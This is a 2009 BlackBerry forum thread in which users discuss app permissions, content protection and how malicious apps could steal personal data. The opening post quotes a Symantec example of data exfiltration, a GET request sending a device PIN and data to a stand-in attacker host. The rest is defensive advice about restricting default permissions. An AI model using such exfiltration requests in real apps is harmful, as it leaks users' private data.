BlackBerry Forums Support Community

BlackBerry Forums Support Community (http://www.blackberryforums.com/)
-   Aftermarket Software (http://www.blackberryforums.com/aftermarket-software/)
-   -   Blackberry Security (Module Permissions) (http://www.blackberryforums.com/aftermarket-software/202272-blackberry-security-module-permissions.html)

Preroll 08-26-2009 03:01 PM

Blackberry Security (Module Permissions)
 
I was reading the following article posted by Symantec:

http://www.symantec.com/avcenter/ref...ry.devices.pdf

I found one section to be quite scary:

Data Theft
A user installs some apparently useful application or video game. The application steals the user's informa-
tion and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9...his+is+top+sec
ret+data


Anybody up on the level of actual attacks downloading third party applications and allowing User Data to be exploited?

SteveO86 08-26-2009 07:58 PM

Most applications that attempt to access those RIM API's will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")

Preroll 08-27-2009 05:25 PM

I wonder if turning on content protection would prohibit the upload of user data ? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.

DaBlackberryBoy 08-27-2009 06:21 PM

I would venture to say that hackers will see this thread and get ideas. I think the best protection is still, know what you install from who. I tend to go with companies that are partnered with Blackberry, which doesn't mean anything, but gives me some sort of sense of peace against stuff like this.

hrbuckley 08-27-2009 08:32 PM

Quote:

Originally Posted by SteveO86 (Post 1459599)
Most applications that attempt to access those RIM API's will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")

There is a blog management application announced in this very forum that requests Input Simulation (Event Injection) permission to turn the camera off after taking a picture, and Security Timeout for some undisclosed purpose. With these two permissions any application can pwne your Blackberry. Yet when I voiced my concerns I was roundly ignored. So your hope that the blogosphere will protect us is, sadly, misplaced.

hrbuckley 08-27-2009 08:35 PM

Quote:

Originally Posted by Preroll (Post 1460370)
I wonder if turning on content protection would prohibit the upload of user data ? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.

Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.

Preroll 08-28-2009 12:08 PM

Quote:

Originally Posted by hrbuckley (Post 1460469)
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.

So if I DO give permission to the application to access the User Data and the data has Content Protection turned on with encryption, can that encrypted User Data still be jeopardized I guess is where I'm going with this?

hrbuckley 08-29-2009 10:01 AM

Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM dta.

Preroll 08-31-2009 12:44 PM

Quote:

Originally Posted by hrbuckley (Post 1461393)
Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM dta.

Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?

hrbuckley 08-31-2009 03:47 PM

Quote:

Originally Posted by Preroll (Post 1462589)
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?

Some applications provide added value from accessing your data, if you want what they do for you. The Facebook contact list interface is a good one. You can say no and the remainder of facebook continues to work.

What is really frustrating, especially with the Wordpress app, is that they have the framework to detect that the user said "No" to a particular permission, and then avoid functions that need it. Instead they (as of my last download) crash.

I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.

Preroll 08-31-2009 05:35 PM

Quote:

Originally Posted by hrbuckley (Post 1462694)
I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.

You mean by going to Application Permissions and changing Default Permissions?

hrbuckley 08-31-2009 07:23 PM

Yes. For installed apps you will/may have to go and change them individually.


All times are GMT -5. The time now is 12:35 AM.

Powered by vBulletin® Version 3.6.12
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.